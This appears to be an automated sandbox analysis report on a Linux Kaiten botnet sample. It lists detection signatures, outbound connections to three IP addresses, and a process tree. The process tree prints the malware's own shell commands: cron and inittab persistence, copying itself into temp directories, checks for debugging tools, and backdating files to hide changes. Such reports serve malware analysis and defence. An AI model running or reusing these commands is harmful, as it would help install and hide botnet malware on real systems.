Analysis Overview
SHA256
7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Threat Level: Known bad
The file 582a434ba0f2e04bd8b5495c50320068 was found to be: Known bad.
Malicious Activity Summary
Identified Kaiten Bot
Kaiten family
Writes file to system bin folder
Modifies rc script
Write file to user bin folder
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-14 02:35
Signatures
Identified Kaiten Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-14 02:35
Reported
2022-03-14 02:37
Platform
ubuntu1804-amd64-en-20211208
Max time kernel
0s
Max time network
102s
Command Line
Signatures
Writes file to system bin folder
| Description | Indicator | Process | Target |
| /bin/crontab | /bin/crontab | N/A | N/A |
| /bin/nvram | /bin/nvram | N/A | N/A |
| /bin/uname | /bin/uname | N/A | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| /etc/rc.local | /etc/rc.local | ./582a434ba0f2e04bd8b5495c50320068 | N/A |
Write file to user bin folder
| Description | Indicator | Process | Target |
| /usr/bin/crontab | /usr/bin/crontab | N/A | N/A |
| /usr/sbin/nvram | /usr/sbin/nvram | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
| /proc/filesystems | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/582a434ba0f2e04bd8b5495c50320068 | /tmp/582a434ba0f2e04bd8b5495c50320068 | /bin/cp | N/A |
| /tmp/.bawtz | /tmp/.bawtz | ./582a434ba0f2e04bd8b5495c50320068 | N/A |
Processes
./582a434ba0f2e04bd8b5495c50320068
[./582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c pidof -x strace > /dev/null]
/bin/pidof
[pidof -x strace]
/bin/sh
[sh -c pidof -x tcpdump > /dev/null]
/bin/pidof
[pidof -x tcpdump]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/sh
[sh -c crontab -r]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -r]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/bin/cat
[cat /etc/inittab2]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c /bin/uname -n]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/uname
[/bin/uname -n]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/dev/shm/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/bin/cat
[cat /etc/inittab2]
/usr/bin/crontab
[crontab -l]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c echo "0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/lock/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c echo "0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
/bin/sh
[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/cp
[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/sh
[sh -c cat /etc/inittab | grep -v "/var/run/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh
[sh -c crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep
[grep -v no cron]
/bin/sh
[sh -c echo "0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/usr/bin/crontab
[crontab -]
/bin/sh
[sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab
[crontab -l]
/bin/cat
[cat /etc/inittab2]
/bin/sh
[sh -c rm -rf /etc/inittab2]
/bin/rm
[rm -rf /etc/inittab2]
/bin/sh
[sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch
[touch -acmr /bin/ls /etc/inittab]
Network
| Country | Destination | Domain | Proto |
| NL | 67.209.115.148:8080 | tcp | |
| SG | 194.59.165.52:8080 | tcp | |
| SG | 37.44.244.106:8080 | tcp |